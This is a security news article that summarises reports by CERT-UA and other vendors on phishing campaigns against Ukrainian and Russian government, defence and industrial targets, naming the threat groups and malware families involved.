In a concerning revelation, the Computer Emergency Response Team of Ukraine (CERT-UA) has reported three cyberattacks targeting state administration and critical infrastructure. The objective of these attacks appears to be data theft from sensitive governmental entities.
According to CERT-UA, the coordinated campaign utilized compromised email accounts to dispatch phishing emails. These messages contained links to reputable services such as DropMeFiles and Google Drive, designed to mislead recipients. In some cases, these links were embedded within PDF attachments, further lending a veneer of legitimacy.
The phishing attempts were crafted to instill urgency; the emails falsely suggested that a government agency was poised to reduce salaries, prompting recipients to click links to discover the affected personnel. This tactic represents a classic example of social engineering aimed at manipulating user behavior.
Clicking these links initiates the download of a Visual Basic Script (VBS) loader. This malicious code is engineered to retrieve and execute a PowerShell script that scans for files with specific extensions and captures screenshots—a clear indication of the attackers’ intent to exfiltrate sensitive information.
The attacks are connected to a threat group identified as UAC-0219, which has reportedly been active since at least fall 2024. Initial methods employed by this group included the use of EXE binaries, a VBS stealer, and a legitimate image editing tool named IrfanView. Collectively, the VBS loader and PowerShell malware have been branded WRECKSTEEL by CERT-UA, although no specific nation has been implicated in these activities.
These incidents follow previous phishing campaigns targeting defense and aerospace entities linked to the ongoing conflict in Ukraine, aimed at harvesting webmail credentials via counterfeit login pages.
The DomainTools Investigations team remarked that the phishing pages were seemingly crafted using Mailu, an open-source mail server software found on GitHub. This approach underscores the adversary’s sophisticated tactics designed to replicate organizations central to Ukraine’s defense and telecommunications sectors, indicating an intention to gather intelligence amid the ongoing conflict.
Additionally, the threat landscape includes Russia-aligned intrusion sets like UAC-0050 and UAC-0006, which have engaged in financially-motivated spam campaigns since early 2025. These groups have primarily targeted sectors such as government, defense, energy, and NGOs, delivering various malware families including Remcos RAT, SmokeLoader, and others.
Moreover, Kaspersky has highlighted recent threats from a group named Head Mare, which has targeted several Russian entities using a malware called PhantomPyramid, capable of responding to instructions from a command-and-control server and downloading further payloads. Similarly, a threat actor known as Unicorn has infiltrated Russian industrial sectors with a VBS trojan intended to extract files from compromised hosts.
In a related development, SEQRITE Labs has reported that academic, governmental, aerospace, and defense networks in Russia are being targeted through weaponized decoy documents, likely disseminated via phishing emails as part of a campaign referred to as Operation HollowQuill. This activity appears to have originated around December 2024 and employs social engineering tactics to disguise malware-laden PDFs as legitimate communications.
This particular threat actor uses a malicious RAR file containing a .NET malware dropper that releases a Golang-based shellcode loader alongside a legitimate OneDrive application and a decoy PDF including a Cobalt Strike payload, showcasing the increasingly sophisticated methods employed in these cyber operations.
